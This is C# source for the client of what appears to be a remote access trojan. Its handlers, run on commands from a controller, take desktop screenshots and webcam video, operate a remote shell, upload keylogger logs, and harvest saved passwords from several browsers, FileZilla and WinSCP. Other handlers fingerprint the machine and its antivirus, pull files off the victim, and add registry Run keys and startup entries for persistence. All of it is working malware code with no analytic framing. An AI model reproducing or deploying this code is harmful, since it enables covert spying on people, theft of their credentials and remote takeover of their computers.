public static void getMonitors(ClientMosaic client)
{
if (Screen.AllScreens.Length > 0)
{
new Packets.ClientPackets.GetMonitorsResponse(Screen.AllScreens.Length).Execute(client);
}
}
public static void getAvailableWebcams(GetAvailableWebcams command, ClientMosaic client)
{
try
{
var deviceInfo = new Dictionary <string, List <string> >();
var videoCaptureDevices = new FilterInfoCollection(FilterCategory.VideoInputDevice);
foreach (FilterInfo videoCaptureDevice in videoCaptureDevices)
{
List <string> supportedResolutions = new List <string>();
var device = new VideoCaptureDevice(videoCaptureDevice.MonikerString);
foreach (var resolution in device.VideoCapabilities)
{
Size frameSize = resolution.FrameSize;
supportedResolutions.Add(frameSize.Width.ToString() + "x" + frameSize.Height.ToString());
}
deviceInfo.Add(videoCaptureDevice.Name, supportedResolutions);
}
if (deviceInfo.Count > 0)
{
new GetAvailableWebcamsResponse(deviceInfo).Execute(client);
}
}
catch (Exception ex)
{
System.Windows.Forms.MessageBox.Show(ex.ToString());
}
}
public static void getExecuteShellCmd(GetExecuteShellCmd command, ClientMosaic client)
{
string input = command.command;
_client = client;
if (_shell == null && input == "exit")
{
return;
}
if (_shell == null)
{
_shell = new RemoteShellController();
}
if (input == "exit")
{
if (_shell != null)
{
_shell.Dispose();
}
}
else
{
_shell.ExecuteCommand(input);
}
}
public static void doDownloadFileCancel(DoDownloadFileCancel packet, ClientMosaic client)
{
if (!_canceledDownloads.ContainsKey(packet.id))
{
_canceledDownloads.Add(packet.id, "canceled");
new DoDownloadFileResponse(packet.id, "canceled", new byte[0], -1, -1, "Canceled").Execute(client);
}
}
public static void getSysInfo(ClientMosaic client)
{
try
{
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
var domainName = (!string.IsNullOrEmpty(properties.DomainName)) ? properties.DomainName : "-";
var hostName = (!string.IsNullOrEmpty(properties.HostName)) ? properties.HostName : "-";
string[] infoCollection = new string[]
{
"Processor (CPU)",
getCpuName(),
"Memory (RAM)",
string.Format("{0} MB", getTotalRamAmount()),
"Video Card (GPU)",
getGpuName(),
"PC Name",
getName(),
"Domain Name",
domainName,
"Host Name",
hostName,
"System Drive",
Path.GetPathRoot(Environment.SystemDirectory),
"System Directory",
Environment.SystemDirectory,
"Uptime",
getUptime(),
"MAC Address",
getMacAddress(),
"LAN IP Address",
getLanIp(),
"WAN IP Address",
GeoInfo.Ip,
"Antivirus",
getAntivirus(),
"Firewall",
GetFirewall(),
"Time Zone",
GeoInfo.Timezone,
"Country",
GeoInfo.Country,
"ISP",
GeoInfo.Isp
};
new Packets.ClientPackets.GetSysInfoResponse(infoCollection).Execute(client);
}
catch
{
}
}
public static void getKeyLogger(GetKeyLoggerLogs packet, ClientMosaic client)
{
new Thread(() =>
{
try
{
int index = 1;
if (!Directory.Exists(Keylogger.LogDirectory))
{
new GetKeyLoggerLogsResponse("", new byte[0], -1, -1, "", index, 0).Execute(client);
return;
}
FileInfo[] iFiles = new DirectoryInfo(Keylogger.LogDirectory).GetFiles();
if (iFiles.Length == 0)
{
new GetKeyLoggerLogsResponse("", new byte[0], -1, -1, "", index, 0).Execute(client);
return;
}
foreach (FileInfo file in iFiles)
{
FileSplit srcFile = new FileSplit(file.FullName);
if (srcFile.MaxBlocks < 0)
{
new GetKeyLoggerLogsResponse("", new byte[0], -1, -1, srcFile.LastError, index, iFiles.Length).Execute(client);
}
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
byte[] block;
if (srcFile.ReadBlock(currentBlock, out block))
{
new GetKeyLoggerLogsResponse(Path.GetFileName(file.Name), block, srcFile.MaxBlocks, currentBlock, srcFile.LastError, index, iFiles.Length).Execute(client);
}
else
{
new GetKeyLoggerLogsResponse("", new byte[0], -1, -1, srcFile.LastError, index, iFiles.Length).Execute(client);
}
}
index++;
}
}
catch (Exception ex)
{
new GetKeyLoggerLogsResponse("", new byte[0], -1, -1, ex.Message, -1, -1).Execute(client);
}
}).Start();
}
public static void getDrives(GetDrives command, ClientMosaic client)
{
DriveInfo[] drives;
try
{
drives = DriveInfo.GetDrives().Where(d => d.IsReady).ToArray();
}
catch (IOException)
{
new SetStatusFileManager("GetDrives I/O error", false).Execute(client);
return;
}
catch (UnauthorizedAccessException)
{
new SetStatusFileManager("GetDrives No permission", false).Execute(client);
return;
}
if (drives.Length == 0)
{
new SetStatusFileManager("GetDrives No drives", false).Execute(client);
return;
}
string[] displayName = new string[drives.Length];
string[] rootDirectory = new string[drives.Length];
for (int i = 0; i < drives.Length; i++)
{
string volumeLabel = null;
try
{
volumeLabel = drives[i].VolumeLabel;
}
catch
{
}
if (string.IsNullOrEmpty(volumeLabel))
{
displayName[i] = string.Format("{0} [{1}, {2}]", drives[i].RootDirectory.FullName,
DriveTypeName(drives[i].DriveType), drives[i].DriveFormat);
}
else
{
displayName[i] = string.Format("{0} ({1}) [{2}, {3}]", drives[i].RootDirectory.FullName, volumeLabel,
DriveTypeName(drives[i].DriveType), drives[i].DriveFormat);
}
rootDirectory[i] = drives[i].RootDirectory.FullName;
}
new GetDrivesResponse(displayName, rootDirectory).Execute(client);
}
public static void getDesktop(Packets.ServerPackets.GetDesktop packet, ClientMosaic client)
{
byte[] desktop;
Rectangle bounds = Screen.AllScreens[packet.monitor].Bounds;
Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height, PixelFormat.Format32bppArgb);
Graphics graph = Graphics.FromImage(bitmap);
graph.CopyFromScreen(bounds.X, bounds.Y, 0, 0, bounds.Size, CopyPixelOperation.SourceCopy);
using (var stream = new MemoryStream())
{
bitmap.Save(stream, ImageFormat.Png);
desktop = stream.ToArray();
}
new GetDesktopResponse(desktop, packet.monitor).Execute(client);
}
public static void getWebcam(GetWebcam command, ClientMosaic client)
{
c = client;
needsCapture = true;
webcam = command.webcam;
quality = command.quality;
if (!webcamStarted)
{
var videoCaptureDevices = new FilterInfoCollection(FilterCategory.VideoInputDevice);
finalVideo = new VideoCaptureDevice(videoCaptureDevices[command.webcam].MonikerString);
finalVideo.NewFrame += finalVideo_NewFrame;
finalVideo.VideoResolution = finalVideo.VideoCapabilities[command.quality];
finalVideo.Start();
webcamStarted = true;
}
}
public static void getProcesses(Packets.ServerPackets.GetProcesses packet, ClientMosaic client)
{
Process[] AllProcesses = Process.GetProcesses();
string[] pNames = new string[AllProcesses.Length];
int[] pIds = new int[AllProcesses.Length];
string[] pTitles = new string[AllProcesses.Length];
int i = 0;
foreach (Process p in AllProcesses)
{
pNames[i] = p.ProcessName + ".exe";
pIds[i] = p.Id;
pTitles[i] = p.MainWindowTitle;
i++;
}
new Packets.ClientPackets.GetProcessesResponse(pNames, pIds, pTitles).Execute(client);
}
public static void getPasswords(GetPasswords packet, ClientMosaic client)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
List <string> raw = new List <string>();
foreach (RecoveredAccount value in recovered)
{
string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.username, value.password, value.URL, value.application, DELIMITER);
raw.Add(rawValue);
}
new GetPasswordsResponse(raw).Execute(client);
}
public static void doDownloadFile(DoDownloadFile command, ClientMosaic client)
{
new Thread(() =>
{
_limitThreads.WaitOne();
try
{
FileSplit srcFile = new FileSplit(command.remotePath);
if (srcFile.MaxBlocks < 0)
{
throw new Exception(srcFile.LastError);
}
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
if (!client.connected || _canceledDownloads.ContainsKey(command.id))
{
break;
}
byte[] block;
if (!srcFile.ReadBlock(currentBlock, out block))
{
throw new Exception(srcFile.LastError);
}
new DoDownloadFileResponse(command.id, Path.GetFileName(command.remotePath), block, srcFile.MaxBlocks, currentBlock, srcFile.LastError).Execute(client);
}
}
catch (Exception ex)
{
new DoDownloadFileResponse(command.id, Path.GetFileName(command.remotePath), new byte[0], -1, -1, ex.Message).Execute(client);
}
_limitThreads.Release();
}).Start();
}
public static void doStartupItemAdd(DoStartupItemAdd packet, ClientMosaic client)
{
try
{
switch (packet.type)
{
case 0:
if (!addRegistryKeyValue(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", packet.name, packet.path, true))
{
throw new Exception("Coul not add value");
}
break;
case 1:
if (!addRegistryKeyValue(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", packet.name, packet.path, true))
{
throw new Exception("Coul not add value");
}
break;
case 2:
if (!addRegistryKeyValue(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", packet.name, packet.path, true))
{
throw new Exception("Coul not add value");
}
break;
case 3:
if (!addRegistryKeyValue(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", packet.name, packet.path, true))
{
throw new Exception("Coul not add value");
}
break;
case 4:
if (!is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (addRegistryKeyValue(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", packet.name, packet.path, true))
{
throw new Exception("Coul not add value");
}
break;
case 5:
if (!is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (addRegistryKeyValue(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", packet.name, packet.path, true))
{
throw new Exception("Coul not add value");
}
break;
case 6:
if (!Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup)))
{
Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
}
string lnkPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup),
packet.name + ".url");
using (var writer = new StreamWriter(lnkPath, false))
{
writer.WriteLine("[InternetShortcut]");
writer.WriteLine("URL=file:///" + packet.path);
writer.WriteLine("IconIndex=0");
writer.WriteLine("IconFile=" + packet.path.Replace('\\', '/'));
writer.Flush();
}
break;
}
}
catch (Exception ex)
{
new SetStatus(string.Format("Adding Autostart Item failed: {0}", ex.Message)).Execute(client);
}
}
public static void doStartupItemRemove(DoStartupItemRemove packet, ClientMosaic client)
{
try
{
switch (packet.type)
{
case 0:
if (!deleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", packet.name))
{
throw new Exception("Could not remove value");
}
break;
case 1:
if (!deleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", packet.name))
{
throw new Exception("Could not remove value");
}
break;
case 2:
if (!deleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", packet.name))
{
throw new Exception("Could not remove value");
}
break;
case 3:
if (!deleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", packet.name))
{
throw new Exception("Could not remove value");
}
break;
case 4:
if (!is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (!deleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", packet.name))
{
throw new Exception("Could not remove value");
}
break;
case 5:
if (!is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (!deleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", packet.name))
{
throw new Exception("Could not remove value");
}
break;
case 6:
string startupItemPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), packet.name);
if (!File.Exists(startupItemPath))
{
throw new IOException("File does not exist");
}
File.Delete(startupItemPath);
break;
}
}
catch (Exception ex)
{
new SetStatus(string.Format("Removing Autostart Item failed: {0}", ex.Message)).Execute(client);
}
}
public static void getStartupItems(GetStartupItems packet, ClientMosaic client)
{
try
{
List <string> startupItems = new List <string>();
using (var key = openReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
startupItems.AddRange(key.getFormattedKeyValues().Select(formattedKeyValue => "0" + formattedKeyValue));
}
}
using (var key = openReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
startupItems.AddRange(key.getFormattedKeyValues().Select(formattedKeyValue => "1" + formattedKeyValue));
}
}
using (var key = openReadonlySubKey(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
startupItems.AddRange(key.getFormattedKeyValues().Select(formattedKeyValue => "2" + formattedKeyValue));
}
}
using (var key = openReadonlySubKey(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
startupItems.AddRange(key.getFormattedKeyValues().Select(formattedKeyValue => "3" + formattedKeyValue));
}
}
if (is64Bit)
{
using (var key = openReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
startupItems.AddRange(key.getFormattedKeyValues().Select(formattedKeyValue => "4" + formattedKeyValue));
}
}
using (var key = openReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
startupItems.AddRange(key.getFormattedKeyValues().Select(formattedKeyValue => "5" + formattedKeyValue));
}
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup)))
{
var files = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).GetFiles();
startupItems.AddRange(from file in files
where file.Name != "desktop.ini"
select string.Format("{0}||{1}", file.Name, file.FullName) into formattedKeyValue
select "6" + formattedKeyValue);
}
new GetStartupItemsResponse(startupItems).Execute(client);
}
catch (Exception ex)
{
new SetStatus(string.Format("Getting Autostart Items failed: {0}", ex.Message)).Execute(client);
}
}
public static void getDirectory(GetDirectory command, ClientMosaic client)
{
bool isError = false;
string message = null;
Action <string> onError = (msg) =>
{
isError = true;
message = msg;
};
try
{
DirectoryInfo dicInfo = new DirectoryInfo(command.remotePath);
FileInfo[] iFiles = dicInfo.GetFiles();
DirectoryInfo[] iFolders = dicInfo.GetDirectories();
string[] files = new string[iFiles.Length];
long[] filessize = new long[iFiles.Length];
string[] folders = new string[iFolders.Length];
int i = 0;
foreach (FileInfo file in iFiles)
{
files[i] = file.Name;
filessize[i] = file.Length;
i++;
}
if (files.Length == 0)
{
files = new string[] { DELIMITER };
filessize = new long[] { 0 };
}
i = 0;
foreach (DirectoryInfo folder in iFolders)
{
folders[i] = folder.Name;
i++;
}
if (folders.Length == 0)
{
folders = new string[] { DELIMITER };
}
new GetDirectoryResponse(files, folders, filessize).Execute(client);
}
catch (UnauthorizedAccessException)
{
onError("GetDirectory No Permission");
}
catch (SecurityException)
{
onError("GetDirectory No permission");
}
catch (PathTooLongException)
{
onError("GetDirectory Path too long");
}
catch (DirectoryNotFoundException)
{
onError("GetDirectory Directory not found");
}
catch (FileNotFoundException)
{
onError("GetDirectory File not found");
}
catch (IOException)
{
onError("GetDirectory I/O error");
}
catch (Exception)
{
onError("GetDirectory Failed");
}
finally
{
if (isError && !string.IsNullOrEmpty(message))
{
new SetStatusFileManager(message, true).Execute(client);
}
}
}
